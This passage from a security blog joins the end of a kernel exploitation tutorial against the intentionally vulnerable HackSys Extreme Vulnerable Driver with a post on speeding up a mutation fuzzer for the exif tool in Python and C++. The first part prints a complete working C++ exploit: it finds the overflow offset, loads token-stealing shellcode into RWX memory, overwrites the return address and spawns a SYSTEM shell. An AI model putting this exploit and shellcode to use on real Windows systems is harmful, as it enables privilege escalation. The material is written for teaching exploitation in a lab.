So hopefully, we can copy 0x800 bytes, and then start overwriting kernel memory on the stack where we can strategically place a pointer to shellcode. Like I said previously, you don’t want a huge overwrite here. I started at 0x800 and worked my way up 4 bytes at a time using a little pattern creating tool I made here until I got a crash.

Incrementing 4 bytes at a time I finally got a crash with a 0x830 buffer length where the last 4 bytes are 0BAD0B0B0.

Getting a Crash

After incrementing methodically from a buffer size of 0x800, and remember that this includes a 4 byte terminator string or else we’ll never stop copying into kernel space and BSOD the host, I finally got an exception that tried to execute code at 41414141 with a total buffer size of 0x830. (I also got an exception when I used a smaller buffer size of 0x82C but the address referenced was a NULL). In this buffer, I had 0x82C \x41 chars and then our terminator. So I figured our offset was going to be at 0x828 or 2088 in decimal, but just to make sure I used my pattern python script to get the exact offset.

root@kali:~# python3 pattern.py -c 2092 -cpp
char pattern[] = 
"0Aa0Ab0Ac0Ad0Ae0Af0Ag0Ah0Ai0Aj0Ak0Al0Am0An0Ao0Ap0Aq0Ar0As0At0Au0Av0Aw0Ax0Ay0Az"
"0A00A10A20A30A40A50A60A70A80A90AA0AB0AC0AD0AE0AF0AG0AH0AI0AJ0AK0AL0AM0AN0AO0AP"
"0AQ0AR0AS0AT0AU0AV0AW0AX0AY0AZ0Ba0Bb0Bc0Bd0Be0Bf0Bg0Bh0Bi0Bj0Bk0Bl0Bm0Bn0Bo0Bp"
"0Bq0Br0Bs0Bt0Bu0Bv0Bw0Bx0By0Bz0B00B10B20B30B40B50B60B70B80B90BA0BB0BC0BD0BE0BF"
"0BG0BH0BI0BJ0BK0BL0BM0BN0BO0BP0BQ0BR0BS0BT0BU0BV0BW0BX0BY0BZ0Ca0Cb0Cc0Cd0Ce0Cf"
"0Cg0Ch0Ci0Cj0Ck0Cl0Cm0Cn0Co0Cp0Cq0Cr0Cs0Ct0Cu0Cv0Cw0Cx0Cy0Cz0C00C10C20C30C40C5"
"0C60C70C80C90CA0CB0CC0CD0CE0CF0CG0CH0CI0CJ0CK0CL0CM0CN0CO0CP0CQ0CR0CS0CT0CU0CV"
"0CW0CX0CY0CZ0Da0Db0Dc0Dd0De0Df0Dg0Dh0Di0Dj0Dk0Dl0Dm0Dn0Do0Dp0Dq0Dr0Ds0Dt0Du0Dv"
"0Dw0Dx0Dy0Dz0D00D10D20D30D40D50D60D70D80D90DA0DB0DC0DD0DE0DF0DG0DH0DI0DJ0DK0DL"
"0DM0DN0DO0DP0DQ0DR0DS0DT0DU0DV0DW0DX0DY0DZ0Ea0Eb0Ec0Ed0Ee0Ef0Eg0Eh0Ei0Ej0Ek0El"
"0Em0En0Eo0Ep0Eq0Er0Es0Et0Eu0Ev0Ew0Ex0Ey0Ez0E00E10E20E30E40E50E60E70E80E90EA0EB"
"0EC0ED0EE0EF0EG0EH0EI0EJ0EK0EL0EM0EN0EO0EP0EQ0ER0ES0ET0EU0EV0EW0EX0EY0EZ0Fa0Fb"
"0Fc0Fd0Fe0Ff0Fg0Fh0Fi0Fj0Fk0Fl0Fm0Fn0Fo0Fp0Fq0Fr0Fs0Ft0Fu0Fv0Fw0Fx0Fy0Fz0F00F1"
"0F20F30F40F50F60F70F80F90FA0FB0FC0FD0FE0FF0FG0FH0FI0FJ0FK0FL0FM0FN0FO0FP0FQ0FR"
"0FS0FT0FU0FV0FW0FX0FY0FZ0Ga0Gb0Gc0Gd0Ge0Gf0Gg0Gh0Gi0Gj0Gk0Gl0Gm0Gn0Go0Gp0Gq0Gr"
"0Gs0Gt0Gu0Gv0Gw0Gx0Gy0Gz0G00G10G20G30G40G50G60G70G80G90GA0GB0GC0GD0GE0GF0GG0GH"
"0GI0GJ0GK0GL0GM0GN0GO0GP0GQ0GR0GS0GT0GU0GV0GW0GX0GY0GZ0Ha0Hb0Hc0Hd0He0Hf0Hg0Hh"
"0Hi0Hj0Hk0Hl0Hm0Hn0Ho0Hp0Hq0Hr0Hs0Ht0Hu0Hv0Hw0Hx0Hy0Hz0H00H10H20H30H40H50H60H7"
"0H80H90HA0HB0HC0HD0HE0HF0HG0HH0HI0HJ0HK0HL0HM0HN0HO0HP0HQ0HR0HS0HT0HU0HV0HW0HX"
"0HY0HZ0Ia0Ib0Ic0Id0Ie0If0Ig0Ih0Ii0Ij0Ik0Il0Im0In0Io0Ip0Iq0Ir0Is0It0Iu0Iv0Iw0Ix"
"0Iy0Iz0I00I10I20I30I40I50I60I70I80I90IA0IB0IC0ID0IE0IF0IG0IH0II0IJ0IK0IL0IM0IN"
"0IO0IP0IQ0IR0IS0IT0IU0IV0IW0IX0IY0IZ0Ja0Jb0Jc0Jd0Je0Jf0Jg0Jh0Ji0Jj0Jk0Jl0Jm0Jn"
"0Jo0Jp0Jq0Jr0Js0Jt0Ju0Jv0Jw0Jx0Jy0Jz0J00J10J20J30J40J50J60J70J80J90JA0JB0JC0JD"
"0JE0JF0JG0JH0JI0JJ0JK0JL0JM0JN0JO0JP0JQ0JR0JS0JT0JU0JV0JW0JX0JY0JZ0Ka0Kb0Kc0Kd"
"0Ke0Kf0Kg0Kh0Ki0Kj0Kk0Kl0Km0Kn0Ko0Kp0Kq0Kr0Ks0Kt0Ku0Kv0Kw0Kx0Ky0Kz0K00K10K20K3"
"0K40K50K60K70K80K90KA0KB0KC0KD0KE0KF0KG0KH0KI0KJ0KK0KL0KM0KN0KO0KP0KQ0KR0KS0KT"
"0KU0KV0KW0KX0KY0KZ0La0Lb0Lc0Ld0Le0Lf0Lg0Lh0Li0Lj0Lk0Ll0Lm0Ln0Lo0";

I then added the terminator to the end like so.

---SNIP---
...Lm0Ln0Lo0\xb0\xb0\xd0\xba";

And we see I got an access violation at 306f4c30.

Using pattern again, I got the exact offset and we confirmed our suspicions.

root@kali:~# python3 pattern.py -o 306f4c30
Exact offset found at position: 2088

From here on out, this plays out just like stack buffer overflow post, so please reference those posts if you have any questions! We initialize our shellcode, create a RWX buffer for it, move it there, and then use the address of the buffer to overwrite eip at that offset we found.

Final Code

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    char shellcode[] = (
        "\x60"
        "\x64\xA1\x24\x01\x00\x00"
        "\x8B\x40\x50"
        "\x89\xC1"
        "\x8B\x98\xF8\x00\x00\x00"
        "\xBA\x04\x00\x00\x00"
        "\x8B\x80\xB8\x00\x00\x00"
        "\x2D\xB8\x00\x00\x00"
        "\x39\x90\xB4\x00\x00\x00"
        "\x75\xED"
        "\x8B\x90\xF8\x00\x00\x00"
        "\x89\x91\xF8\x00\x00\x00"
        "\x61"
        "\x5d"
        "\xc2\x08\x00"
        );

    LPVOID shellcode_address = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_address, shellcode, sizeof(shellcode));

    cout << "[>] RWX shellcode allocated at: " << hex << shellcode_address
        << "\n";

    BYTE input_buff[0x830] = { 0 };

    // 'A' * 0x828
    memset(input_buff, '\x41', 0x828);

    memcpy(input_buff + 0x828, &shellcode_address, 0x4);

    BYTE terminator[] = "\xb0\xb0\xd0\xba";

    memcpy(input_buff + 0x82c, &terminator, 0x4);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

void spawn_shell()
{
    PROCESS_INFORMATION Process_Info;
    ZeroMemory(&Process_Info, 
        sizeof(Process_Info));
    
    STARTUPINFOA Startup_Info;
    ZeroMemory(&Startup_Info, 
        sizeof(Startup_Info));
    
    Startup_Info.cb = sizeof(Startup_Info);

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL, 
        NULL, 
        NULL, 
        0, 
        CREATE_NEW_CONSOLE, 
        NULL, 
        NULL, 
        &Startup_Info, 
        &Process_Info);
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);

    spawn_shell();
}

Conclusion

This should net you a system shell.

Fuzzing Like A Caveman 2: Improving Performance

By: h0mbre
8 April 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’ we’ll just be looking at improving the performance of our previous fuzzer. This means there won’t be any wholesale changes, we’re simply looking to improve upon what we already had in the previous post. This means we’ll still end up walking away from this blogpost with a very basic mutation fuzzer (please let it be faster!!) and hopefully some more bugs on a different target. We won’t really tinker with multi-threading or multi-processing in this post, we will save that for subsequent fuzzing posts.

I feel the need to add a DISCLAIMER here that I am not a professional developer, far from it. I’m simply not experienced enough with programming at this point to recognize opportunities to improve performance the way a more seasoned programmer would. I’m going to use my crude skillset and my limited knowledge of programming to improve our previous fuzzer, that’s it. The code produced will not be pretty, it will not be perfect, but it will be better than what we had in the previous post. It should also be mentioned that all testing was done on VMWare Workstation on an x86 Kali VM with 1 CPU and 1 Core.

Let’s take a moment to define ‘better’ in the context of this blog post as well. What I mean by ‘better’ here is that we can iterate through n fuzzing iterations faster, that’s it. We’ll take the time to completely rewrite the fuzzer, use a cool language, pick a hardened target, and employ more advanced fuzzing techniques at a later date. :)

Obviously, if you haven’t read the previous post you will be LOST!

Analyzing Our Fuzzer

Our last fuzzer, quite plainly, worked! We found some bugs in our target. But we knew we left some optimizations on the table when we turned in our homework. Let’s again look at the fuzzer from the last post (with minor changes for testing purposes):

#!/usr/bin/env python3

import sys
import random
from pexpect import run
from pipes import quote

# read bytes from our valid JPEG and return them in a mutable bytearray 
def get_bytes(filename):

	f = open(filename, "rb").read()

	return bytearray(f)

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

def magic(data):

	magic_vals = [
	(1, 255),
	(1, 255),
	(1, 127),
	(1, 0),
	(2, 255),
	(2, 0),
	(4, 255),
	(4, 0),
	(4, 128),
	(4, 64),
	(4, 127)
	]

	picked_magic = random.choice(magic_vals)

	length = len(data) - 8
	index = range(0, length)
	picked_index = random.choice(index)

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (1, )
	if picked_magic[0] == 1:
		if picked_magic[1] == 255:			# 0xFF
			data[picked_index] = 255
		elif picked_magic[1] == 127:		# 0x7F
			data[picked_index] = 127
		elif picked_magic[1] == 0:			# 0x00
			data[picked_index] = 0

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (2, )
	elif picked_magic[0] == 2:
		if picked_magic[1] == 255:			# 0xFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
		elif picked_magic[1] == 0:			# 0x0000
			data[picked_index] = 0
			data[picked_index + 1] = 0

	# here we are hardcoding all of the byte overwrites for all of the tuples that being (4, )
	elif picked_magic[0] == 4:
		if picked_magic[1] == 255:			# 0xFFFFFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		elif picked_magic[1] == 0:			# 0x00000000
			data[picked_index] = 0
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 128:		# 0x80000000
			data[picked_index] = 128
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 64:			# 0x40000000
			data[picked_index] = 64
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 127:		# 0x7FFFFFFF
			data[picked_index] = 127
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		
	return data

# create new jpg with mutated data
def create_new(data):

	f = open("mutated.jpg", "wb+")
	f.write(data)
	f.close()

def exif(counter,data):

    command = "exif mutated.jpg -verbose"

    out, returncode = run("sh -c " + quote(command), withexitstatus=1)

    if b"Segmentation" in out:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

if len(sys.argv) < 2:
	print("Usage: JPEGfuzz.py <valid_jpg>")

else:
	filename = sys.argv[1]
	counter = 0
	while counter < 1000:
		data = get_bytes(filename)
		functions = [0, 1]
		picked_function = random.choice(functions)
		picked_function = 1
		if picked_function == 0:
			mutated = magic(data)
			create_new(mutated)
			exif(counter,mutated)
		else:
			mutated = bit_flip(data)
			create_new(mutated)
			exif(counter,mutated)

		counter += 1

You may notice a few changes. We’ve:

  • commented out the print statement for the iterations counter every 100 iterations,
  • added print statements to notify us of any Segfaults,
  • hardcoded 1k iterations,
  • added this line: picked_function = 1 temporarily so that we eliminate any randomness in our testing and we only stick to one mutation method (bit_flip())

Let’s run this version of our fuzzer with some profiling instrumentation and we can really analyze how much time we spend where in our program’s execution.

We can make use of the cProfile Python module and see where we spend our time during 1,000 fuzzing iterations. The program takes a filepath argument to a valid JPEG file if you remember, so our complete command line syntax will be: python3 -m cProfile -s cumtime JPEGfuzzer.py ~/jpegs/Canon_40D.jpg.

It should also be noted that adding this cProfile instrumentation could slow down performance. I tested without it and for the iteration sizes we use in this post, it didn’t seem to make a significant difference.

After letting this run, we see our program output and we get to see where we spent the most time during execution.

2476093 function calls (2474812 primitive calls) in 122.084 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     33/1    0.000    0.000  122.084  122.084 {built-in method builtins.exec}
        1    0.108    0.108  122.084  122.084 blog.py:3(<module>)
     1000    0.090    0.000  118.622    0.119 blog.py:140(exif)
     1000    0.080    0.000  118.452    0.118 run.py:7(run)
     5432  103.761    0.019  103.761    0.019 {built-in method time.sleep}
     1000    0.028    0.000  100.923    0.101 pty_spawn.py:316(close)
     1000    0.025    0.000  100.816    0.101 ptyprocess.py:387(close)
     1000    0.061    0.000    9.949    0.010 pty_spawn.py:36(__init__)
     1000    0.074    0.000    9.764    0.010 pty_spawn.py:239(_spawn)
     1000    0.041    0.000    8.682    0.009 pty_spawn.py:312(_spawnpty)
     1000    0.266    0.000    8.641    0.009 ptyprocess.py:178(spawn)
     1000    0.011    0.000    7.491    0.007 spawnbase.py:240(expect)
     1000    0.036    0.000    7.479    0.007 spawnbase.py:343(expect_list)
     1000    0.128    0.000    7.409    0.007 expect.py:91(expect_loop)
     6432    6.473    0.001    6.473    0.001 {built-in method posix.read}
     5432    0.089    0.000    3.818    0.001 pty_spawn.py:415(read_nonblocking)
     7348    0.029    0.000    3.162    0.000 utils.py:130(select_ignore_interrupts)
     7348    3.127    0.000    3.127    0.000 {built-in method select.select}
     1000    0.790    0.001    1.777    0.002 blog.py:15(bit_flip)
     1000    0.015    0.000    1.311    0.001 blog.py:134(create_new)
     1000    0.100    0.000    1.101    0.001 pty.py:79(fork)
     1000    1.000    0.001    1.000    0.001 {built-in method posix.forkpty}
-----SNIP-----

For this type of analysis, we don’t really care about how many segfaults we had since we’re not really tinkering much with the mutation methods or comparing different methods. Granted there will be some randomness here, as a crash would necessitate extra processing, but this will do for now.

I snipped only the sections of code where we spent more than 1.0 seconds cumulatively. You can see we spent by far the most time in blog.py:140(exif). A whopping 118 seconds out of 122 seconds total. Our exif() function seems to be a major problem in our performance.

We can see that most of the time we spent underneath that function was directly related to the function, we see plenty of appeals to the pty module from our pexpect usage. Let’s rewrite our function using Popen from the subprocess module and see if we can improve performance here!

Here is our redefined exif() function:

def exif(counter,data):

    p = Popen(["exif", "mutated.jpg", "-verbose"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

Here is our performance report:

2065580 function calls (2065443 primitive calls) in 2.756 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000    2.756    2.756 {built-in method builtins.exec}
        1    0.038    0.038    2.756    2.756 subpro.py:3(<module>)
     1000    0.020    0.000    1.917    0.002 subpro.py:139(exif)
     1000    0.026    0.000    1.121    0.001 subprocess.py:681(__init__)
     1000    0.099    0.000    1.045    0.001 subprocess.py:1412(_execute_child)
 -----SNIP-----

What a difference. This fuzzer, with the redefined exif() function performed the same amount of work in only 2 seconds!! That’s insane! The old fuzzer: 122 seconds, new fuzzer: 2.7 seconds.

Improving Further in Python

Let’s try to continue improving our fuzzer all within Python. First, let’s get a good benchmark for us to perform against. We’ll get our optimized Python fuzzer to iterate through 50,000 fuzzing iterations and we’ll use the cProfile module again to get some fine-grained statistics about where we spend our time.

102981395 function calls (102981258 primitive calls) in 141.488 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  141.488  141.488 {built-in method builtins.exec}
        1    1.724    1.724  141.488  141.488 subpro.py:3(<module>)
    50000    0.992    0.000  102.588    0.002 subpro.py:139(exif)
    50000    1.248    0.000   61.562    0.001 subprocess.py:681(__init__)
    50000    5.034    0.000   57.826    0.001 subprocess.py:1412(_execute_child)
    50000    0.437    0.000   39.586    0.001 subprocess.py:920(communicate)
    50000    2.527    0.000   39.064    0.001 subprocess.py:1662(_communicate)
   208254   37.508    0.000   37.508    0.000 {built-in method posix.read}
   158238    0.577    0.000   28.809    0.000 selectors.py:402(select)
   158238   28.131    0.000   28.131    0.000 {method 'poll' of 'select.poll' objects}
    50000   11.784    0.000   25.819    0.001 subpro.py:14(bit_flip)
  7950000    3.666    0.000   10.431    0.000 random.py:256(choice)
    50000    8.421    0.000    8.421    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.162    0.000    7.358    0.000 subpro.py:133(create_new)
  7950000    4.096    0.000    6.130    0.000 random.py:224(_randbelow)
   203090    5.016    0.000    5.016    0.000 {built-in method io.open}
    50000    4.211    0.000    4.211    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.643    0.000    4.194    0.000 os.py:617(get_exec_path)
    50000    1.733    0.000    3.356    0.000 subpro.py:8(get_bytes)
 35866791    2.635    0.000    2.635    0.000 {method 'append' of 'list' objects}
   100000    0.070    0.000    1.960    0.000 subprocess.py:1014(wait)
   100000    0.252    0.000    1.902    0.000 selectors.py:351(register)
   100000    0.444    0.000    1.890    0.000 subprocess.py:1621(_wait)
   100000    0.675    0.000    1.583    0.000 selectors.py:234(register)
   350000    0.432    0.000    1.501    0.000 subprocess.py:1471(<genexpr>)
 12074141    1.434    0.000    1.434    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.059    0.000    1.358    0.000 subprocess.py:1608(_try_wait)
    50000    1.299    0.000    1.299    0.000 {built-in method posix.waitpid}
   100000    0.488    0.000    1.058    0.000 os.py:674(__getitem__)
   100000    1.017    0.000    1.017    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

50,000 iterations took us a grand total of 141 seconds, this is great performance compared to what we were dealing with. We previously took 122 seconds to do 1,000 iterations! Once again filtering on only time where we spent over 1.0 seconds, we see that we again spent most of our time in exif() but we also see some performance issues in bit_flip() as we spent 25 cumulative seconds there. Let’s try to optimize that function a bit.

Let’s go ahead and repost what the old bit_flip() function looked like:

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

This function is admittedly a bit clumsy. We can simplify it greatly by utilizing better logic. I find this is often the case with programming in my limited experience, you can have all of the fancy esoteric programming knowledge you want, but if the logic behind your program is unsound, then the program’s performance will suffer.

Let’s reduce the amount of type conversions we do, for instance ints to str or vice versa, and let’s just get less code into our editor. We can accomplish what we want with a re-defined bit_flip() function as follows:

def bit_flip(data):

	length = len(data) - 4

	num_of_flips = int(length * .01)

	picked_indexes = []
	
	flip_array = [1,2,4,8,16,32,64,128]

	counter = 0
	while counter < num_of_flips:
		picked_indexes.append(random.choice(range(0,length)))
		counter += 1


	for x in picked_indexes:
		mask = random.choice(flip_array)
		data[x] = data[x] ^ mask

	return data

If we employ this new function and monitor the results, we get a performance grade of:

59376275 function calls (59376138 primitive calls) in 135.582 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  135.582  135.582 {built-in method builtins.exec}
        1    1.940    1.940  135.582  135.582 subpro.py:3(<module>)
    50000    0.978    0.000  107.857    0.002 subpro.py:111(exif)
    50000    1.450    0.000   64.236    0.001 subprocess.py:681(__init__)
    50000    5.566    0.000   60.141    0.001 subprocess.py:1412(_execute_child)
    50000    0.534    0.000   42.259    0.001 subprocess.py:920(communicate)
    50000    2.827    0.000   41.637    0.001 subprocess.py:1662(_communicate)
   199549   38.249    0.000   38.249    0.000 {built-in method posix.read}
   149537    0.555    0.000   30.376    0.000 selectors.py:402(select)
   149537   29.722    0.000   29.722    0.000 {method 'poll' of 'select.poll' objects}
    50000    3.993    0.000   14.471    0.000 subpro.py:14(bit_flip)
  7950000    3.741    0.000   10.316    0.000 random.py:256(choice)
    50000    9.973    0.000    9.973    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.163    0.000    7.034    0.000 subpro.py:105(create_new)
  7950000    3.987    0.000    5.952    0.000 random.py:224(_randbelow)
   202567    4.966    0.000    4.966    0.000 {built-in method io.open}
    50000    4.042    0.000    4.042    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.539    0.000    3.828    0.000 os.py:617(get_exec_path)
    50000    1.843    0.000    3.607    0.000 subpro.py:8(get_bytes)
   100000    0.074    0.000    2.133    0.000 subprocess.py:1014(wait)
   100000    0.463    0.000    2.059    0.000 subprocess.py:1621(_wait)
   100000    0.274    0.000    2.046    0.000 selectors.py:351(register)
   100000    0.782    0.000    1.702    0.000 selectors.py:234(register)
    50000    0.055    0.000    1.507    0.000 subprocess.py:1608(_try_wait)
    50000    1.452    0.000    1.452    0.000 {built-in method posix.waitpid}
   350000    0.424    0.000    1.436    0.000 subprocess.py:1471(<genexpr>)
 12066317    1.339    0.000    1.339    0.000 {method 'getrandbits' of '_random.Random' objects}
   100000    0.466    0.000    1.048    0.000 os.py:674(__getitem__)
   100000    1.014    0.000    1.014    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

As you can see from the metrics, we only spend 14 cumulative seconds in bit_flip() at this point! In our last go-round, we spent 25 seconds here, this is almost twice as fast at this point. We’re doing a good job of optimizing in my opinion here.

Now that we have our ideal Python benchmark (keep in mind there might be opportunities for multi-processing or multi-threading but let’s save this idea for another time), let’s go ahead and port our fuzzer to a new language, C++ and test the performance.

New Fuzzer in C++

To get started, let’s just go ahead and flat out run our newly optimized python fuzzer through 100,000 fuzzing iterations and see how long in total it takes.

118749892 function calls (118749755 primitive calls) in 256.881 seconds

100k iterations in only 256 seconds! That destroys our previous fuzzer.

That will be our benchmark we try to beat in C++. Now, as unfamiliar as I am with the nuances of Python development, multiply that by 10 and you’ll have my unfamiliarity with C++. This code might be laughable to some, but it’s the best I could manage at the present moment and we can explain each function as it relates to our previous Python code.

Let’s go through, function by function, and describe their implementation.

//
// this function simply creates a stream by opening a file in binary mode;
// finds the end of file, creates a string 'data', resizes data to be the same
// size as the file moves the file pointer back to the beginning of the file;
// reads the data from the into the data string;
//
std::string get_bytes(std::string filename)
{
	std::ifstream fin(filename, std::ios::binary);

	if (fin.is_open())
	{
		fin.seekg(0, std::ios::end);
		std::string data;
		data.resize(fin.tellg());
		fin.seekg(0, std::ios::beg);
		fin.read(&data[0], data.size());

		return data;
	}

	else
	{
		std::cout << "Failed to open " << filename << ".\n";
		exit(1);
	}

}

This function, as my comment says, simply retrives a byte string from our target file, which in the case of our testing will still be Canon_40D.jpg.

//
// this will take 1% of the bytes from our valid jpeg and
// flip a random bit in the byte and return the altered string
//
std::string bit_flip(std::string data)
{
	
	int size = (data.length() - 4);
	int num_of_flips = (int)(size * .01);

	// get a vector full of 1% of random byte indexes
	std::vector<int> picked_indexes;
	for (int i = 0; i < num_of_flips; i++)
	{
		int picked_index = rand() % size;
		picked_indexes.push_back(picked_index);
	}

	// iterate through the data string at those indexes and flip a bit
	for (int i = 0; i < picked_indexes.size(); ++i)
	{
		int index = picked_indexes[i];
		char current = data.at(index);
		int decimal = ((int)current & 0xff);
		
		int bit_to_flip = rand() % 8;
		
		decimal ^= 1 << bit_to_flip;
		decimal &= 0xff;
		
		data[index] = (char)decimal;
	}

	return data;

}

This function is a direct equivalent of our bit_flip() function in our Python script.

//
// takes mutated string and creates new jpeg with it;
//
void create_new(std::string mutated)
{
	std::ofstream fout("mutated.jpg", std::ios::binary);

	if (fout.is_open())
	{
		fout.seekp(0, std::ios::beg);
		fout.write(&mutated[0], mutated.size());
	}
	else
	{
		std::cout << "Failed to create mutated.jpg" << ".\n";
		exit(1);
	}

}

This function will simply create a temporary mutated.jpg file, similar to our create_new() function that we had in the Python script.

//
// function to run a system command and store the output as a string;
// https://www.jeremymorgan.com/tutorials/c-programming/how-to-capture-the-output-of-a-linux-command-in-c/
//
std::string get_output(std::string cmd)
{
	std::string output;
	FILE * stream;
	char buffer[256];

	stream = popen(cmd.c_str(), "r");
	if (stream)
	{
		while (!feof(stream))
			if (fgets(buffer, 256, stream) != NULL) output.append(buffer);
				pclose(stream);
	}

	return output;

}

//
// we actually run our exiv2 command via the get_output() func;
// retrieve the output in the form of a string and then we can parse the string;
// we'll save all the outputs that result in a segfault or floating point except;
//
void exif(std::string mutated, int counter)
{
	std::string command = "exif mutated.jpg -verbose 2>&1";

	std::string output = get_output(command);

	std::string segfault = "Segmentation";
	std::string floating_point = "Floating";

	std::size_t pos1 = output.find(segfault);
	std::size_t pos2 = output.find(floating_point);

	if (pos1 != -1)
	{
		std::cout << "Segfault!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
	else if (pos2 != -1)
	{
		std::cout << "Floating Point!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
}

These two functions work together. get_output takes a C++ string as a parameter and will run that command on the operating system and capture the output. The function then returns the output as a string to the calling function exif().

exif() will take the output and look for Segmentation fault or Floating point exception errors and then if found, will write those bytes to a file and save them as a crash.<counter>.jpg file. Very similar to our Python fuzzer.

//
// simply generates a vector of strings that are our 'magic' values;
//
std::vector<std::string> vector_gen()
{
	std::vector<std::string> magic;

	using namespace std::string_literals;

	magic.push_back("\xff");
	magic.push_back("\x7f");
	magic.push_back("\x00"s);
	magic.push_back("\xff\xff");
	magic.push_back("\x7f\xff");
	magic.push_back("\x00\x00"s);
	magic.push_back("\xff\xff\xff\xff");
	magic.push_back("\x80\x00\x00\x00"s);
	magic.push_back("\x40\x00\x00\x00"s);
	magic.push_back("\x7f\xff\xff\xff");

	return magic;
}

//
// randomly picks a magic value from the vector and overwrites that many bytes in the image;
//
std::string magic(std::string data, std::vector<std::string> magic)
{
	
	int vector_size = magic.size();
	int picked_magic_index = rand() % vector_size;
	std::string picked_magic = magic[picked_magic_index];
	int size = (data.length() - 4);
	int picked_data_index = rand() % size;
